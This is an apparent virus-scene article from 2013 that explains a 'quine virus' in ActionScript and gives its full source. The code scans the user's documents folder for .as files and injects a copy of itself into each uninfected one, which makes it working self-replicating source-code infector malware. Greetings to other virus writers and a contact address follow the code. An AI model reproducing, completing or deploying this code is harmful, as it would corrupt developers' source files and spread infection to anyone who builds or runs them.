﻿                         Quine Viruses in ActionScript
                              roy g biv / defjam


What is it?

A  quine is a program which emits a copy of its own source code as its output.
We  can  make a variation of this technique to make a virus, which copies  its
own  source  code instead.  This is harder than printing itself.  The idea  is
source  code  infection,  well known for many years already, but we do  it  in
elegant form for the first time.  Here is the code:

package
{
    import flash.display.Sprite;
	
    public class quine extends Sprite
    {
        function quine()
        {

            {
                var a:String="";                                                        /* place atoi(code,16) here first, begin with second '"' */
                var b:String="{var a:String=\""+a;                                      /* create string declaration and append atoi entire code */
                var c:int;
                for(c=0;c<a.length;c+=2)
                    b+=String.fromCharCode(parseInt(a.substr(c,2),16));                 /* append plaintext code */
                import flash.filesystem.*;
                var d:Array=File.documentsDirectory.getDirectoryListing();
                for(c=0;c<d.length;c++)
                    if(d[c].url.substring(d[c].url.length-3).toLowerCase()==".as")      /* find all .as files */
                        try
                        {
                            var e:FileStream=new FileStream();
                            e.open(d[c],"read");
                            var f:String=e.readUTFBytes(e.bytesAvailable);              /* read entire file */
                            e.close();
                            var g:int=f.lastIndexOf("}",f.lastIndexOf("}",f.lastIndexOf("}")-1)-1);
                                                                                        /* search backwards for third-last '}' */
                            if(f.charAt(g-1)!='/')                                      /* check for infection marker */
                            {
                                e.open(d[c],"write");
                                e.writeUTFBytes(f.substr(0,g)+b+f.substr(g));           /* write everything */
                                e.close();
                            }
                        }
                        catch(z)
                        {
                        }
            }
            /*Quine - roy g biv 09/10/13*/}

    }
}


Greets to friendly people (A-Z):

Active - Benny - herm1t - hh86 - jqwerty - Malum - Obleak - pr0mix -
Prototype - Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man -
Ultras - uNdErX - Vallez - Vecna - Whitehead


rgb/defjam october 2013
iam_rgb@hotmail.com
